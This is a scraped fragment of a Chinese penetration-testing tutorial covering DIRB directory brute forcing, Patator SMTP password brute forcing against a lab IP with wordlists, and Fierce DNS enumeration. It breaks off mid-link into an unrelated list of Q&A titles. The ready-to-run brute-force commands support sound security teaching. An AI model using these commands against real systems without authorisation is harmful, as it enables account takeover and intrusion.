&/code&&/pre&&/div&&h3&使用 DIRB 爆破目录&/h3&&p&注:&a href=&/?target=http%3A//dirb.sourceforge.net/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&DIRB&i class=&icon-external&&&/i&&/a& 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的&a href=&/?target=https%3A///lanjelot/patator& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&patator&i class=&icon-external&&&/i&&/a&,&a href=&/?target=https%3A///maurosoria/dirsearch& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&dirsearch&i class=&icon-external&&&/i&&/a&,&a href=&/?target=https%3A//www.owasp.org/index.php/Category%3AOWASP_DirBuster_Project& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&DirBuster&i class=&icon-external&&&/i&&/a&, 国内的御剑等等。&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt
&/code&&/pre&&/div&&h3&Patator – 全能暴力破解测试工具&/h3&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&# git clone /lanjelot/patator.git /usr/share/patator
# SMTP 爆破
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
&/code&&/pre&&/div&&h3&使用 Fierce 爆破 DNS&/h3&&p&注:Fierce 会检查 DNS 服务器是否允许区域传送。如果允许,就会进行区域传送并通知用户,如果不允许,则可以通过查询 DNS 服务器枚举主机名。类似工具:&a href=&/?target=https%3A///lijiejie/subDomainsBrute& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&subDomainsBr}
我要回帖
更多推荐
- ·航海狼人杀背包栏隐藏饥荒海难海盗帽怎么获得办
- ·魔兽争霸洛丹伦的夏天3冰封王座重回洛丹伦的文件名是什么?
- ·魔兽争霸洛丹伦的夏天3冰封王座重回洛丹伦文件名是什么?
- ·求救:月下夜想曲地图完成度怎么看200.5%,还差0.1%不知道在哪里
- ·职业君人CPT和平精英训练营燃烧瓶在哪?· 职业君人CPT和平精英训练营燃烧瓶在哪?入营宣誓词
- ·山东大学威海校区中017招收哪些专业
- ·肝胆肾结石体外碎石病,怎么治疗,求排石碎石方法。
- ·Please tellme什么意思 me what this is?
- ·什么是"胜3ds破解引导花屏"?如何来引导?它达成的标准是什么
- ·大便不通,早口干早上起来口苦口臭口干,还有口臭是什么原因
- ·轩辕传奇手游电脑版IOS电脑版 IOS电脑上怎么玩
- ·什么叫泄漏电流“暗电流”以及如何判断是否正常
- ·蚕法斗生长发育阶段到一定的阶段会变成();从()出来的蚕蛾交配产卵,蚕蛾的死亡是蚕生命的结束。
- ·精忠报国 屠洪刚??
- ·警惕自己成为慢性不抱怨 成为 政治正确者,长期不抱怨 成为 政治正确对身心有什么伤害
- ·一根火线和一根火线一根零线怎么接两个开关开关
- ·中考成绩志愿考了531分但是第三志愿不想上第二志愿没有录取有没有办法
- ·学校要评职称了,很多高中老师如何评职称都评了,我准备评但是学历不够,我在广西,
- ·如何能把这方格里的字猜字谜连成一句话祝福通顺的语句。谢谢
- ·人生只为狂与绢…品味健康人生这句话哪个字错了是谁说的
- ·o为什么会出现 git删除remote origins/origin/head
- ·五个月孩子小孩经常便秘怎么办办
- ·宝宝总是小孩子打嗝怎么办处理
- ·洪荒之以力伐天复方药?后面的字忘了?
- ·求助.谁有insanity视频 Asylum 2的课程表
- ·韧带拉伤挂什么科了怎么办
- ·清华大学留学生办公室 没有抢到宿舍 有人跟我一样吗
- ·德与人之间的关系是什么?德与人的教师个人师德修养计划方法有哪些
- ·热缩管的作用在日常生活中有什么作用
- ·桔子分期信用额度扣了,昨天短信分期房贷扣款短信信也发了,怎么到今天还是代发货
- ·每天为什么早上起来头会晕一些晕坐定又无事什么原因
- ·伊可新鱼肝油胶囊能吃吗能给宝宝吃吗
- ·西北工业大学 张开复知音之家假期开不开
- ·知道在英国一星期的顺序中每天的名称和顺序,这一教学内容适合
